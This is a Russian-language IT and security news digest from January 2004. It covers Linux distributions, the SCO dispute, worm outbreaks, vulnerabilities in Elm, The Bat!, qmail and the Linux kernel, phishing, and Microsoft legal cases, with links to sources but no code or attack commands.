Довольно интересная подборка фактов приведена на сайте DistroWatch.com. Связана она с различными дистрибутивами Linux (как существующими, так и существовавшими ранее). Из занимательных фактов. Многие дистрибутивы были созданы на основе уже существующих (например, Mandrake и ASP на основе RedHat/Fedora). Так вот, если верить приведённым на сайте данным, наибольшее количество дистрибутивов было создано на основе Debian и RedHat/Fedora - по 56, далее следуют: Knoppix (странно, кажется, он сам построен на базе Debian - прим. ньюсмейкера) - 28, независмые дистрибутивы (надо понимать, от которых ничего не произошло) - 22, Slackware - 20, потом почему то следуют производные Mandrake. Данные, приведённые в таблицах довольно небесспорны, а в некоторых местах - сомнительны, но ознакомиться с ними не мешает даже для удовлетворения собственного любопытства. Также приведены данные по географии стран, в которых были произведены различные дистрибутивы. Согласно им, на первом месте США - 44 дистрибутива, далее - Германия - 16, за ней следует Канада с 15 дистрибутивами. Россия значится всего с 4-мя дистрибутивами (ALT, ASP, Cool, Polar Bear). Вот такая вот математика.
Подробности - http://www.distrowatch.com/stats.php

20/01/2004 11:09 Еще одна Linux-компания дает гарантию от нападок SCO.
В ответ на враждебные действия SCO Group против Linux компания Red Hat предлагает новую схему юридической защиты, гарантируя замену любого кода, признанного нарушающим авторские права. Гарантия, предлагаемая в рамках нового проекта Open Source Assurance Program, предоставляется всем существующим и будущим заказчикам операционной системы Red Hat Enterprise Linux. Компания объявила об этом накануне выставки-конференции LinuxWorld, которая открывается в среду в Нью-Йорке. В августе, на прошлой выставке LinuxWorld, Red Hat объявила об открытии фонда юридической защиты программистов open-source. «Мне кажется, что благодаря, в частности, компенсационным фондам, эта проблема с каждым днем становится все менее актуальной», — говорит об угрозах SCO аналитик CE Unterberg Towbin по ценным бумагам Екатерина Игберт. Способ разработки программного обеспечения с открытым исходным кодом может приводить к трудно разрешимым спорам об авторских правах. В некоторых случаях, таких как с базой данных MySQL, всеми авторскими правами на ПО владеет компания. Однако каждый разработчик ядра Linux сохраняет за собой авторские права на весь код, который он написал, если только эти права уже кому-нибудь не принадлежат.
Подробности - http://news.zdnet.co.uk/0,39020330,39119198,00.htm

20/01/2004 10:17 Молодой калифорниец признался во взломе сети лаборатории НАСА.
20-летний житель Калифорнии Джейсон Дикман (Jason Diekman) признал себя виновным в незаконном проникновении в компьютерную сеть лаборатории реактивных двигателей НАСА в 1998 году, сообщает агентство Network News. Дикману также предъявлены обвинения во взломе 24 компьютеров Стэнфордского университета и незаконном проникновении в сети университетов Калифорнии в Лос-Анджелесе и Сан-Диего, Гарварда и Корнуэлла. Еще одно обвинение, выдвинутое против Дикмана, связано с использованием украденных номеров кредитных карт и совершением незаконных транзакций на несколько тысяч долларов. В случае признания вины Джейсона, ему грозит лишение свободы на срок до 16 лет.
Источник - http://www.viruslist.com

19/01/2004 21:59 Еще раз про смерть Red Hat Linux 7.2, 7.3, 8.0.
Пользователи операционной системы Red Hat Linux версий 7.1, 7.2, 7.3 и 8 на этой неделе получили по электронной почте уведомления о т.н. EOL (end-of-life — «конец жизни»). «Больше мы не будем выпускать обновления по безопасности, исправления ошибок и проводить прочие изменения в этих продуктах», — говорится в обращении к подписчикам Red Hat Network (RHN). Поддержка Red Hat Linux 9 продлится до 30 апреля. Это напоминание стало уже четвертым за последние месяцы. По словам Leigh Day, компания заботится о каждом из своих клиентов, и по этой причине предлагает им достойные альтернативные планы (переход на Fedora или RHEL). Тем не менее, переход на главный на данный момент продукт компании — Red Hat Enterprise Linux — может оказаться совсем неподходящим для бывших пользователей Red Hat 7.x/8/9. Так, например, в рассылке Fedora Linux Legacy Project один из бывших пользователей Red Hat Linux пишет: «Переход с 7.x на RHEL непрост. Даже несмотря на то, что продавцы говорят, что RHEL 2.1 в основном аналогичен 7.2, он требует полной переустановки».
Источник - http://www.nixp.ru

19/01/2004 18:52 LinuxDefender Live!CD с полной поддержкой записи на NTFS.
Вышел ещё один дистрибутив Linux из серии Live. Название - LinuxDefender Live!CD. Построен на базе дистрибутива Knoppix (Debian). Включает в себя BitDefender SMTP Proxy Antivirus/AntiSpam for Linux, web базированный доступ к конфигурации BitDefender SMTP Proxy, а так же BitDefender Linux Edition. Включена полная поддержка записи файловой системы NTFS.
ISO-образ - ftp://ftp.bitdefender.com/pub/linux/free/LinuxDefender/LinuxDefender_2003-12-18.iso

19/01/2004 18:19 "Лаборатория Касперского" усовершенствовала защиту для Linux Workstations.
"Лаборатория Касперского" представила коммерческое решение для рабочих станций под управлением Linux - "Антивирус Касперского" 5.0 для Linux Workstations. Программу характеризует максимальная автоматизация всех функциональных процессов. В частности, согласно заданному пользователем расписанию осуществляется автоматическая проверка файловой системы рабочей станции. Однако в случае необходимости антивирусное сканирование может быть инициировано в любой момент времени по дополнительному запросу. Обновление антивирусной базы данных выполняется через интернет при помощи встроенной утилиты. Для обеспечения возможности удаленного управления Антивирус Касперского для Linux Workstations интегрирован с системой администрирования Webmin. Основное отличие "Антивируса Касперского" 5.0 для Linux Workstations - реализация новой антивирусной технологии, являющейся последней разработкой экспертов "Лаборатории Касперского". Внедренное во все компоненты продукта антивирусное ядро включает в себя все антивирусные технологии мирового класса и обеспечивает значительное по сравнению с предшествующей версией снижение нагрузки на производительность компьютера при полном сохранении функциональности решения.
Подробнее - http://www.kaspersky.ru/news.html?id=145190492

19/01/2004 17:47 Настольный компьютер, загружающийся за 10 секунд.
Компания InterVideo собирается выйти на рынок с новыми настольными компьютерами InstantOn PC, отличающимися чрезвычайно высокой скоростью загрузки, сообщает "Компьюлента". В частности, устройства будут готовы к работе уже через десять секунд после подачи питания. Основной компонент InstantOn PC - специальная программная платформа LinDVD, основанная на базе открытой операционной системы Linux. При этом все модули LinDVD записываются в BIOS, благодаря чему и обеспечивается короткое время загрузки. Правда, в таком режиме нельзя редактировать документы или электронные таблицы, зато можно просматривать DVD-фильмы и цифровые фотографии, прослушивать музыкальные композиции в формате МР3 и обычные CD-диски. Интересно, что вместе с LinDVD на компьютере может быть установлена и какая-либо другая ОС, например, Windows XP. Минимальные требования к аппаратной части InstantOn PС - процессор Intel Pentium 4 и 128 Мб оперативной памяти. Предполагается, что компьютеры InstantOn PC будут использоваться, в основном, в качестве домашних мультимедийных центров. В этом случае платформа LinDVD станет хорошей альтернативой операционной системе Windows XP Media Center, загрузка которой может занимать до нескольких минут.
Подробности - http://www.intervideo.com/jsp/Press.jsp?mode=01-09-2004

19/01/2004 17:19 Статья "Принципы написания remote эксплоитов".
На сайте forumer.com, предназначенным для свободного и автоматического создания форумов различной тематики на форуме code.unixserver.at опубликована статья "Принципы написания remote эксплоитов", представляющая собой перевод оригинальной статьи Robin Walser, выполненный господином с ником intuit. В статье подробно разбирается механизм нахождения уязвимости, написания удалённого эксплоита. Естественно, для полноценного понимания изложенного необходимо знание ANSI C, а также механизма реализации сокетов на Си в ОС *NIX.
Cтатья - http://forumer.com/index.php?mforum=code&showtopic=13

19/01/2004 17:05 Зачем Microsoft продлила поддержку Windows 98?
Ровно неделю назад корпорация Microsoft обнародовала новые планы относительно поддержки операционных систем Windows 98, Windows 98 SE и Windows Me. Официальной причиной внесения изменений в график предоставления поддержки называются многочисленные жалобы со стороны пользователей Windows в развивающихся странах, которые оказались просто-напросто не готовы платить сотни долларов за более современные ОС Windows 2000 и Windows ХР. Однако, по мнению сотрудников аналитической компании Gartner, истинная причина заключается несколько в другом. Дело в том, что на сегодняшний день операционная система Windows 98 установлена на 26,7% всех компьютеров в мире. А к концу нынешнего года данный показатель должен сократиться практически вдвое - до 15,3%. Естественно, пользователям придется искать замену морально устаревшей платформе, и многие из них, конечно, выберут продукцию Microsoft. Другие же, напротив, попытаются перейти на более дешевые ОС на базе открытых исходных кодов, в первую очередь, на Linux. Понятно, что для софтверного гиганта такое положение дел неприемлемо, в связи с чем корпорация и пытается удержать клиентов, предлагая им дополнительную поддержку старых операционных систем.
Подробности - http://www3.gartner.com/DisplayDocument?doc_cd=119336

19/01/2004 16:53 Британские звукоиздатели хотят последовать примеру RIAA.
Британский институт фонографии (BPI) заявил о своем намерении преследовать пользователей файлообменных сетей подобно тому, как это уже делают члены Ассоциации звукозаписывающих компаний Америки (RIAA), сообщает сайт PC Advisor. По словам директора BPI Эндрю Йитса (Andrew Yeates), его организация разрабатывает программу, направленную на увеличение ответственности пользователей файлообменных сетей. Конечной целью британских звукоиздателей является привлечение меломанов к пользованию легальными файлообменными ресурсами такими, как iTunes и Napster. Их работа на территории Великобритании должна начаться в этом году. В случае если не все пользователи сделают выбор в пользу легальных сервисов, Йитс намерен обратиться в суд. При этом судебные разбирательства не будут носить спонтанного характера, а затронут лишь самых активных нарушителей законодательства в области защиты авторских прав.
Источник - http://www.viruslist.com

19/01/2004 16:13 Microsoft отнимает имя у юного веб-дизайнера.
Юристы корпорации Microsoft обратились к 17-летнему канадскому веб-дизайнеру Майку Роу (Mike Rowe) с требованием передать зарегистрированное им доменное имя (mikerowesoft.com) в распоряжение компании. Как сообщается на сайте Ananova, они утверждают, что, прибавив к своему имени слово "soft", он нарушил авторские права всемирно известного производителя программного обеспечения, и что название сайта в таком виде может дезориентировать клиентов Microsoft. Дело в том, что в английском произношении названия компании и сайта звучат одинаково: "майкроусофт". Еще в ноябре Майк Роу получил по электронной почте письмо от адвокатов корпорации, которые потребовали незамедлительно передать права на доменное имя в их распоряженние. Однако Майк отказался сделать это бесплатно и, в свою очередь, потребовал от Microsoft выплатить ему компенсацию за потраченные время и усилия. Компания предложила ему отступные в размере 10 долларов. Именно столько стоит регистрация домена. В ответ подросток предложил Microsoft более реалистично оценить вложенные им в разработку сайта усилия. По его словам, он хотел бы получить как минимум 10 тысяч долларов. "Они отказались дать мне больше десятки, так что я проигнорировал их последнее послание и с тех пор они больше не обращались", добавил Майк Роу.
Подробности - http://www.ananova.com/news/story/sm_857316.html?menu=news.quirkies

19/01/2004 15:22 Зарегистрирована эпидемия нового сетевого червя I-Worm.Bagle.
"Лаборатория Касперского", ведущий российский разработчик систем защиты от вирусов, хакерских атак и спама, сообщает об обнаружении сетевого червя "I-Worm.Bagle". Вредоносная программа распространяется через электронную почту. В настоящее время экспертами зафиксированы десятки тысяч случаев заражения данной вредоносной программой в различных странах, что позволяет определить говорить о начале масштабной эпидемии. Червь представляет собой исполняемый в среде Windows файл размером около 15 Кб, приложенный к письму с произвольным адресом отправителя. Необходимо отметить, что тема сообщения "Hi", равно как его содержание "Test =)" и подпись "Test, yep" неизменны, в то время как название вложения произвольно. После запуска червь копирует себя в системный каталог Windows, после чего производит попытку загрузки и запуска на пораженном компьютере "троянский" прокси-сервер Mitglieder. Данный прокси-сервер позволяет злоумышленнику использовать зараженный компьютер для дальнейшей рассылки содержащих вредоносный код писем. В настоящее время ссылки на все сетевые источники загрузки Mitglieder удалены, и "I-Worm.Bagle" не способен использовать данную технологию для увеличения темпов самораспространения. Таким образом, на данный момент "I-Worm.Bagle" использует процедуру, стандартную для данного вида вредоносных программ. Он сканирует файловую систему пораженного компьютера в поисках файлов с расширениями wab, txt, htm, html и r1 и рассылает себя по всем найденных в них адресах электронной почты. Для отправки почты червь использует собственный SMTP-сервер.
Источник - http://www.kaspersky.ru

18/01/2004 14:30 Распространение интернета увеличивает угрозу кибер-войны.
Аналитики Gartner полагают, что постоянное усиление зависимости развитых стран от интернета как важнейшего канала передачи данных, может спровоцировать гонку кибер-вооружений. Согласно расчетам компании Gartner, которые приводит TechWeb, кибер-война может разразиться уже в 2005 году, когда уровень проникновения интернет-технологий станет достаточно высоким, чтобы Сеть можно было отнести к разряду «критической инфраструктуры». В этом случае, по своей разрушительной силе грамотно спланированная сетевая атака будет сравнима со взрывом тактической ядерной боеголовки средних размеров. Конец света, разумеется, не наступит, но компании, особо зависимые от бесперебойной работы серверов, могут понести «непоправимый ущерб». Возможными целями кибер-атаки могут быть компьютерные сети, управляющие работой электростанций, энергетических сетей, железных дорог и других крупных объектов, включая национальные телефонные сети.
Источник - http://www.internet.ru

18/01/2004 13:09 Выход январского номера Crypto-Gram.
Как всегда, в середина месяца вышел очередной (первый в этом году) номер электронного журнала, посвящённого проблемам криптографии и сетевой безопасности Crypto-Gram. Об этом сообщил Bruce Schneier, основатель и CTO компании Counterpane Internet Security, Inc., которая, собственно , выпускает и поддерживает выпуск этого журнала. В выпуске: Color-Coded Terrorist Threat Levels; Crypto-Gram Reprints; Fingerprinting Foreigners; News; Terrorists and Almanacs; Counterpane News; More "Beyond Fear" Reviews; Security Notes from All Over: President Musharraf and Signal Jammers; WEIS; New Credit Card Scam; Diverting Aircraft and National Intelligence; Comments from Readers. Читайте, просвещайтесь.
Журнал - http://www.schneier.com/crypto-gram-0401.html

18/01/2004 12:22 «Вирусный Пантеон» 2003 года.
Подводя итоги ушедшего года, компания Panda Software по традиции определила наиболее заметные и примечательные вирусы 2003 г. Несмотря на довольно спокойную обстановку в целом, некоторые периоды буквально взрывались волной вирусной активности. Особенно активны вирусы были летом, когда в обращении находились такие «герои», как Blaster, Nachi и Sobig.F. Итак, испанские эксперты определили победителей в следующих номинациях.
- Самый разрушительный. Это номинация достается червю Bugbear.B. На то есть две причины. Во-первых, это наиболее часто обнаруживаемый компьютерный вирус в 2003 году (согласно данным, собранным программой Panda ActiveScan), а значит, большая часть ответственности за нанесенный пользователям ущерб лежит именно на нем. Во-вторых, этот червь может завершать процессы ряда антивирусных программ и межсетевых экранов, оставляя компьютер пользователя беззащитным перед вирусными атаками и хакерами, со всеми вытекающими отсюда последствиями.
- Самый эффективный. В этой категории никому не удалось превзойти SQLSlammer. В течение нескольких часов этот вредоносный код атаковал огромное число SQL серверов, парализовав работу миллионов пользователей.
- Самый стойкий. Эта номинация легко достается Klez.I. Несмотря на первое появление в апреле далекого 2002-го года, этот вирус все еще встречается в ежемесячных хит-парадах наиболее часто обнаруживаемых компьютерных вирусов. Благодаря применяемым методам “социального инжиниринга“ и уязвимости Internet Explorer, этот крепкий орешек до сих пор остается на плаву.
- Самый оригинальный. Эту номинацию забирает червь Gibe.C. Отправителем письма, содержащего вирус, якобы была компания Microsoft. Утверждалось, что в письме лежит разработанная ею заплатка для обновления ОС.
- Самый надоедливый. Это звание присуждено вирусу Blaster, попадающему на компьютеры жертв благодаря уязвимости DCOM некоторых версий Windows. Ошибка в коде вируса приводила к многократным перезагрузкам зараженных компьютеров. Уровень распространения вируса говорит о том, что многие вылеченные компьютеры были повторно им заражены.
- Самый коварный. В 2003 году им стал Nachi.A. Он выдавал себя за «Робин Гуда», приходящего на помощь компьютерам, зараженным вирусом Blaster. Nachi.A удалял Blaster и даже исправлял уязвимость, которую последний использовал для заражения компьютера. Однако, вскоре появлялась прятавшаяся за безмятежным голубым небосводом грозная туча - Nachi.A использовал уязвимость WebDAV, благодаря которой на зараженном компьютере может быть запущен любой код.
- Самый оппортунистический. Это Ganda.A. Сразу после начала войны в Ираке этот вирус пытался привлечь внимание пользователей фотографиями военных действий, якобы сделанными со спутника.
- Самые быстрые. 2003 год явил нам два наиболее быстро распространяющихся вируса за всю историю существования вредоносных кодов: SQLSlammer и Sobig.F. Последний, представляющий собой червя массовой рассылки, был запущен на нескольких компьютерах и уже через несколько часов путешествовал по всему земному шару в миллионах электронных писем.
Источник - http://www.viruslab.ru

18/01/2004 11:54 Уязвимость в Elm.
Переполнение буфера обнаружено в почтовом клиенте Elm при выполнении команды 'frm'. Удаленный пользователь может послать специально обработанное почтовое сообщение с чрезмерно длинным полем заголовка, чтобы выполнить произвольные команды на уязвимой системе при приёме почты жертвой. Необходимо отметить, что часть производителей дистрибутивов Linux выпустили соответствующие обновления.
Источник - http://www.securitylab.ru

18/01/2004 11:15 Настройка apache 1.3.X для массового виртуального вебхостинга.
Андрей Шетухин написал довольно полезную для системных администраторов статью под названием "Настройка apache 1.3.X для массового виртуального вебхостинга". Как пишет сам автор "Для создания полноценного сервера вебхостинга необходимо выполнить как минимум следующие условия: безопасность, расширяемость, легкость в администрировании, простота в использовании клиентами". Настройка описана применительно к операционной системе FreeBSD 5.X (4.х).
Статья - http://irka.df.ru/massvirthosting.html

18/01/2004 10:29 Red Hat Enterprise 3 Update 1.
Как сообщается на http://www.nixp.ru, компания Red Hat представила выход первого обновления для своего Linux-дистрибутива для корпоративного использования - RHEL 3 (Red Hat Enterprise Linux). Update 1 доступен для: -- Red Hat Enterprise Linux AS (v. 3 for x86); -- Red Hat Enterprise Linux AS (v. 3 for Itanium); -- Red Hat Enterprise Linux AS (v. 3 for AMD64); -- Red Hat Enterprise Linux AS (v. 3 for iSeries and pSeries); -- Red Hat Enterprise Linux AS (v. 3 for S/390); -- Red Hat Enterprise Linux AS (v. 3 for zSeries); -- Red Hat Enterprise Linux ES (v. 3 for x86); -- Red Hat Enterprise Linux WS (v. 3 for x86); -- Red Hat Enterprise Linux WS (v. 3 for Itanium); -- Red Hat Enterprise Linux WS (v. 3 for AMD64); -- Red Hat Developer Suite (for x86); -- Red Hat Cluster Suite (for x86). Среди нововведений: возможность установки обновленного CD1 ISO-изображения через Red Hat Network; возможность обновления Extras, Developer Suite и Cluster Suite ISO-изображений через Red Hat Network; увеличена производительность системы для конфигураций с крупными базами данных; увеличена производительность для AMD64 NUMA-систем; улучшена платформенная поддержка IBM iSeries, pSeries, zSeries- и S/390-систем; платформенная поддержка для новых Itanium2-основанных систем; новые драйвера, исправления в безопасности, устранение ошибок, изменения в большом количестве программных пакетов. Кстати, получить дистрибутив RHEL3 можно всего за 400 р. (4 диска) по адресу: http://www.nixp.ru/cdrom/
Подробности - https://rhn.redhat.com/errata/

18/01/2004 10:24 Правительство Франции приступило к борьбе со спамом.
Правительство Франции создало специальную группу для борьбы со спамом, сообщает агентство Europa Press. Задачей новой структуры будет «координация действий физических и юридических лиц в рамках противостояния массовым несанкционированным почтовым рассылкам как во Франции, так и за ее пределами». Созданной группе предстоит заниматься всеми вопросами, связанными со спамом. Речь, в частности, идет о создании и открытии французского центра для изучения и разработки антиспаммерских методик.
Источник - http://www.viruslist.ru

17/01/2004 20:08 Обновление информации об уязвимости в ядре Linux.
Paul Starzetz и Wojciech Purczynski из польской команды iSEC, которые обнаружили уязвимость в системном вызове mremap(2) ядра Linux, выпустили обновлённое описание этой уязвимости. В новой версии они привели более подробный анализ уязвимости, а также описания механизма её использования. В конце документа приведён эксплоит этой уязвимости.
Подробности - http://isec.pl/vulnerabilities/isec-0013-mremap.txt

17/01/2004 19:14 Уязвимость в The Bat!
Наш уважаемый соотечественник ЗАРАЗА сообщил об обнаружении уязвимости в популярном почтовом клиенте (MUA) The Bat! версии 2.01. Суть уязвимости заключается в повреждении памяти при разборе соообщений из многих частей подписаных PGP (программа для шифрации сообщений и генерации электронных подписей от Филиппа Цимермана). Подобные сообщения имеют заголовок protocol="application/pgp-signature" и могут иметь рекурсивно включённые части. Автор пишет, что он ещё не производил отладку программы для выяснения уязвимого кода, однако при разборе подобных сообщений The Bat! производит чтение и запись в неразмещённых областях памяти, что, теоретически, может позволить выполнить произвольный код в системе. Так как Бат имееет собственный обрабочик исключительных ситуаций (exception handler), программа аварийно не завершается. При проведении переписки с производителем (молдавской командой RitLabs) уязвимости в версиях 2.03 Beta и 2.02 CE уязвимость обнаружена не была. Также был создан пример .msg - сообщения для демонстрации уязвимости.
Подробности - http://www.security.nnov.ru/search/document.asp?docid=5635

17/01/2004 18:45 Уязвимость в qmail.
Известный иссследователь компьютерной безопасности Georgi Guninski сообщает об обнаружении уязвимости в популярном почтовом MDA Qmail. Причём уязвимости обнаружено две: первая связана с тем, что можно удалённо свалить qmail-smtpd, сформировав очень длиннную SMTP-сессию, так как возникает переполнение целочисленного типа на письме со строкой свыше 2Gb, правда, сессия рушится только текущая, глобально процесс не завершается. Вторая уязвимость предоставляет возможность, при использовании отладчика gdb перезаписать участки памяти при организации динной SMTP-сессии. Автором написан скрипт на Перл, который демонстрирует уязвимость.
Подробности - http://www.guninski.com/qmailcrash.html

17/01/2004 18:03 В 2003 году вирусы причинили ущерб на сумму 55 миллиардов долларов.
Сотрудники одного из ведущих производителей антивирусных программ компании Trend Micro Enterprise подсчитали, что в 2003 году компьютерные вирусы причинили мировому бизнесу ущерб в 55 миллиардов долларов, сообщает Reuters. По их мнению, в 2004 году эта сумма значительно возрастет. В 2002 году, по данным Trend Micro, вирусы нанесли ущерб на сумму от 20 до 30 миллиардов долларов, а в 2001 - 13 миллиардов. Эксперты компании не стали давать точного прогноза на нынешний год, ограничившись лишь общими словами о том, что ущерб будет расти, а вирусы станут более совершенными. По мнению специалистов, в нынешнем году самую большую опасность будут представлять вирусы, которые оказывают сразу несколько вредоносных воздействий на зараженный компьютер - программа, рассылающая спам, устраивает массовую рассылку по корпоративной сети, и пока администраторы пытаются ее отследить, устанавливает в другую, которая мониторит систему в поиске паролей и номеров ID. Вирусы будут легко проникать в систему через каналы программ быстрой связи, таких, как ICQ, IRC, Jabber и других. Кроме того, как и в прошлом году, одним из популярных средств доставки вирусов будет спам, что, по мнению специалистов, окончательно заставит пользователей относиться к письмам с нежелательной рекламой, как к серьезной опасности.
Источник - http://www.lenta.ru

17/01/2004 17:20 Panda Software предупреждает о случаях фальсификации банковских писем.
В последние дни многие пользователи получили электронные письма с просьбой подтвердить свои банковские данные на специальной веб-странице из-за якобы возникших проблем технического характера. В качестве примера можно привести электронное письмо, адресованное клиентам СИТИ-банка (CITIBANK) с темой «Important Fraud Alert from Citibank» («Важное сообщение о случаях мошенничества в Сити-банке»). В самом сообщении говорится о том, что в целях проведения операции, направленной на обнаружение нелегальной банковской деятельности, пользователям необходимо проверить правильность своих реквизитов на специальном веб-сайте. Компания Panda Software предупреждает, что все эти сообщения – фальсификация, их главная цель – получение конфиденциальной информации о клиенте (номера счетов, имена пользователей, пароли и другие секретные данные). Рассылаемые сообщения были тщательно проработаны на языке HTML, чтобы максимально походить на оригинальные сообщения онлайновой банковской службы. Фальшивые письма используют еще не исправленную URLSpoof уязвимость браузера Microsoft Internet Explorer. Благодаря этой дыре пользователь думает, что веб-страница, к которой он обращается по ссылке из электронного письма, является официальным банковским сайтом, тогда как на самом деле это всего лишь реплика оригинала, находящаяся на другом сервере. Если пользователь введет запрашиваемые данные, они попадут прямиком в руки мошенника, создавшего это письмо и веб-страницу.
Источник - http://www.viruslab.ru

17/01/2004 16:48 Любителя читать чужую почту судят как хакера.
Первым жителем Северной территории Австралии, обвиняемым в незаконном доступе к компьютерным данным, стал 37-летний Крэг Генри Гриффис (Craig Henry Griffis), сообщает сайт газеты The Mercury. По данным обвинения, Гриффис незаконно завладел почтовым паролем своей бывшей приятельницы и удалил несколько писем от одного из ее корреспондентов. Кроме того, обвиняемый также сделал копии некоторых других посланий. В довершение, Гриффис изменил пароль почтового ящика, чтобы женщина больше не могла им воспользоваться. Австралийцу предъявлены обвинения в незаконном доступе к компьютерным данным и их изменении. Первое появление Гриффиса в зале суда города Дарвин состоялось в декабре прошлого года, а начало слушаний назначили на март. По мнению некоторых юристов, рассмотрение дела Гриффиса может дойти до Верховного суда страны. Деяние Гриффиса не может рассматриваться как «хакерство» в распространенном понятии этого термина, поскольку обвиняемый знал пароль потерпевшей. Тем не менее, по законам Северной терртории, подобный поступок попадает под действие антихакерского законодательства, введенного в прошлом году.
Источник - http://www.viruslist.ru

17/01/2004 16:12 Судья вынес решение против Microsoft по делу Eolas.
В среду федеральный судья Чикаго вынес постановление по иску на 512 млн долл. о нарушении патента не в пользу Microsoft, что может привести к серьезным изменениям во многих из наиболее распространенных программных продуктах для интернета. Судья Джеймс Цагель сказал, что он не видит причин для пересмотра августовского вердикта жюри присяжных, согласно которому веб-браузер Microsoft Internet Explorer нарушает патент, принадлежащий небольшой компании Eolas Technologies и Калифорнийскому университету. Решение Цагеля запрещает Microsoft распространять версии своего веб-ПО, в которых содержится технология, предположительно нарушающая авторские права владельцев патента. Microsoft, как ожидается, немедленно подаст апелляцию. Августовское постановление создало легкую панику в сообществе веб-разработчиков, которые боятся возможного изменения способа разработки или настройки многих основных функций веб-страниц в том случае, если Eolas одержит окончательную победу. Патент Eolas охватывает технологию, используемую для вызова внутри веб-страницы отдельных приложений, таких как медиаплеер или программа просмотра документов. В последние месяцы веб-разработчики посвятили много времени прослеживанию истории программирования, стараясь найти так называемые «прототипы», или свидетельства того, что эту технологию изобрели еще до Eolas. Это лишило бы патент силы. Бюро патентов и торговых марок США организовало необычные слушания для расследования обоснованности патента.
Подробности - http://zdnet.com.com/2100-1104_2-5141318.html

17/01/2004 15:35 Минюст США пресек попытку Microsoft приучить пользователей к браузеру Internet Explorer.
Министерство юстиции США обязало компанию Microsoft исправить функцию операционной системы Windows XP, ответственную за перенаправление интернет-пользователя на сайты онлайновых музыкальных магазинов, сообщает газета Washington Post. Как известно, после длительных судебных разбирательств власти США в рамках антимонопольного процесса принудили Microsoft не делать вспомогательные приложения, такие как интернет-браузер или проигрыватель медиафайлов, неотъемлемыми компонентами операционной системы и оставлять в ОС возможность для сторонних разработчиков создавать такие программы. Microsoft подчинилась этому решению, однако было обнаружено, что в последней версии ОС Windows XP при использовании в качестве основного браузера продукт стороннего разработчика при нажатии на предоставляемую ОС ссылку на онлайновую музыкальную службу продаж она все равно задействует Microsoft Internet Explorer. Microsoft согласилась с доводами Минюста и сообщила, что соответствующее обновление Windows XP выйдет в ближайшее время и будет доступно на сайте Windows Update.
Подробности - http://www.washingtonpost.com/wp-dyn/articles/A21099-2004Jan15.html

16/01/2004 16:16 Маршрутизатор данных и мультимедиа.
Компания SMC Networks выпустила новый беспроводной маршрутизатор для домашних сетей - SMC2304WBR-AG EZ-Stream Universal 2.4GHz/5GHz Wireless Cable/DSL Broadband Router. Устройство поддерживает все три варианта стандарта 802.11. Маршрутизатор снабжен четырьмя портами Ethernet 10/100 и может выполнять функции шлюза Internet-доступа. Имеется встроенный межсетевой экран класса Stateful Inspection. Предусмотрены функции "родительского контроля" - блокировки доступа к сайтам по URL, ключевому слову и IP-адресу. Маршрутизатор можно использовать совместно с EZ-Stream Universal Wireless Multimedia Receiver - устройством производства SMC, которое позволяет передавать мультимедиа-файлы, хранимые на компьютерах в домашней сети, для воспроизведения на телевизоре или стереосистеме. Как утверждают в SMC, при использовании в режимах 802.11a и g маршрутизатор обеспечивает скорость передачи данных до 108 Мбит/c. Поддерживаются стандартные протоколы безопасности 802.1x.
Источник - http://www.cnews.ru

16/01/2004 15:53 Выпущена новая утилита для перекодировки текста по запросу.
Молодой украинский разработчик утилит для Windows SprigSoft выпустил программу Arum Switcher, которая повышает эффективность и удобство работы с текстом у тех пользователей, которые используют более одной клавиатурной раскладки. При этом оригинальность программы Arum Switcher заключается в том, что она способна работать со всеми языками мира. Основная задача Arum Switcher состоит в исправлении текста, по ошибке набранного в другой раскладке. Кроме этого, Arum Switcher позволяет изменять регистр букв набранного текста – все буквы большие; все маленькие; первая заглавная, остальные прописные. Поскольку программа корректирует текст только по «приказу» пользователя, она отличается от программ автоматической коррекции текста. Безусловно, автоматические программы - транслитеризаторы удобны, но те пользователи, которым часто приходится иметь дело со «словами-исключениями», например, функциями и операторами языков программирования, вряд ли могут пользоваться такими программами постоянно. Дело в том, что для полноценной работы им придется составить весьма длинные списки слов-исключений, которые, к тому же, будут утеряны при следующей переустановке операционной системы, либо вообще не доступны на других компьютерах. Именно поэтому использование автоматических программ-транслитеризаторов видится скорее неэффективным, чем повышающим удобство работы. Важным моментом, выделяющим Arum Switcher из числа других программ-транслитеризаторов, является возможность использования ряда функций, не доступных более не в одной из программ. Среди них особого упоминания заслуживает поддержка всех языков мира и умляутов, которые набираются с использованием «мертвых клавиш».
Источник - http://www.cnews.ru

16/01/2004 13:32 Компьютерный юмор.
Замечательный рассказ под названием "Если бы "Титаник" построили на 100 лет позже.." опубликовал в журнале Upgrade Юрий Нестеренко. Если попробовать его охарактеризовать вкратце, то автор постарался на место "Титаника" подставить многострадальную ОС Windows и рассказать, что при этом получилось. :) Рекомендуется к прочтению, дабы поднять себе настроение перед выходными. ;)
Рассказ - http://yun.complife.ru/miscell/titanic.txt

16/01/2004 13:03 15 января объявлен днём "персонального файрволла".
Microsoft, TruSecure, Zone Labs, McAfee и ряд других фирм надеются убедить пользователей Сети в том, что безопасность их компьютеров зависит не только от усилий программистов, но и от самих пользователей, сообщает ScurityLab. Основная идея «Personal Firewall Day» состоит в том, что принцип безопасного серфинга в чем-то сродни концепции безопасного секса: полную защиту от напастей гарантирует только полное воздержание, но опасность может быть значительно снижена и без таких потрясающих жертв, если пользоваться презервативом. В контексте данной кампании роль этого важного средства личной гигиены выполняет брандмауэр. Кроме того, продолжая аналогию, каждый пользователь интернета должен помнить, что от его действий зависит жизнь и психическое здоровье его коллег по Сети: большинство программ-зомби, применяемых для совершения DDoS-атак, а также троянов, рассылающих спам, сидят именно на компьютерах беспечных пользователей, не утруждающих себя установкой антивирусов и других средств компьютерной безопасности. При этом, компании-участницы «Personal Firewall Day» категорически отметают любые подозрения в личном интересе, вроде желания лишний раз засветить свой бренд и продать под шумок лишнюю тысячу копий своих брандмауэров. Как сообщает агентство CNET, цитируя слова Джеймса Шмидта (James Schmidt) из McAfee, «Множество людей по всему миру [находятся в опасности], поскольку у них не установлены брандмауэры. Мне все равно, какой брандмауэр они купят (хотя мне, конечно, было бы приятно, если бы они купили мой), главное чтобы они были защищены». Был создан соответствующий сайт в Интернете.
Сайтик - http://www.personalfirewallday.org/

16/01/2004 11:45 В университете штата Миссури украдено 17 тысяч почтовых паролей.
